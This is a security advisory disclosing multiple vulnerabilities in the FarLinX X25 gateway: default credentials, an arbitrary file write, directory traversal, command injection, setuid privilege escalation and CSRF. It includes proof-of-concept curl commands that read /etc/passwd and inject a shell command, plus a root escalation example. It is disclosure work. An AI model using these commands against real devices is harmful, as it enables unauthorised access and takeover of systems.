JAHx164 - FarLinX X25 gateway multiple vulnerabilities

Posted by Eldar Marcussen on Thu Sep 15 02:15:00 EDT 2016

These vulnerabilities were discovered by Eldar "Wireghoul" Marcussen.

About

The FarLinX X25 Gateway is the answer for handling all your X.25 to TCP/IP migration requirements. Featuring routing between TCP and X.25, TCP and XOT, X.25 and XOT, data conversion, a Triple-X PAD, Host PAD, an extension for special POS protocols and even an X.25 switch all at a very affordable cost, the FarLinX X25 Gateway fits the bill for TCP/IP to X.25 interconnection. -- http://www.farsite.com/

Fixed username allows easier bruteforcing

The device has a default login of "admin" with the password "farlinx" and while it does allow the password to be changed the username is hardcoded in the device Apache configuration and cannot be changed.

CVE-2014-7175 - Arbitrary write

The file 'fsSaveUIPersistence.php' will write user supplied data to the file 'fsUI.xyz' with minimal changes. This can be used to place attacker controlled code on the file system. This can easily be identifiedby examining the file source:

<?php 
    //Receive data from client
  $strReceivedata = $_REQUEST['strSubmitData'];
    //replace some chars
  //$strReceivedata = preg_replace("/(\r\n|\n|\r)/", "\n", $strReceivedata);
  //$strReceivedata = preg_replace("/\\\/", "", $strReceivedata);
  //error_log($strReceivedata);

    $pFile = fopen("fsUI.xyz", "w+");
    if(fwrite($pFile, $strReceivedata) == false) 
    {
        error_log("fail to save data to file");
    }
    fclose($pFile);
    //error_log("Finished Running PHP");
?>

CVE-2014-7174 - Multiple directory traversal

There are several php scripts based around log handling that are vulnerable to directory traversal. The following examples are provided:

curl -u admin:farlinx -k -d 'viewFilesName=../../../../../../../../etc/passwd'  https://host/sysZipTranLogFileShow.php
curl -u admin:farlinx -k -d 'savefileNames=../../../../../etc/passwd'  https://host/sysSaveEventLog.php
curl -u admin:farlinx -k -d 'saveFilesName=../../../../../etc/passwd'  https://host/sysSaveTransacLog.php
curl -u admin:farlinx -k -d 'zipfileName=../../../../../etc/passwd'  https://host/sysZipLogFileShow.php

CVE-2014-7173 - Command injection

Several command injection vulnerabilities were identified in the following scripts: sysSaveMonitorData.php, fsx25MonProxy.php, syseditdate.php, iframeupload.php and sysRestoreX25Cplt.php. The following example is provided:

curl -u admin:farlinx 'http://host/fsx25MonProxy.php?strSubmitData=start+|ifconfig'

Privilege escalation

The file /http/bin/execCmd is a setuid binary that takes a command to run with elevated privileges as a command line argument. The following example shows this in effect:

$ id
uid=99(nobody) gid=101(nobody) groups=101(nobody)
$ /http/bin/execCmd id
uid=0(root) gid=101(nobody) groups=101(nobody)

Cross Site Request Forgery

Almost everyone of the urls provided in this advisory are exploitable through CSRF. No CSRF specific proof of concept is provided beyond the urls listed above.


Posted by Eldar Marcussen | Permanent link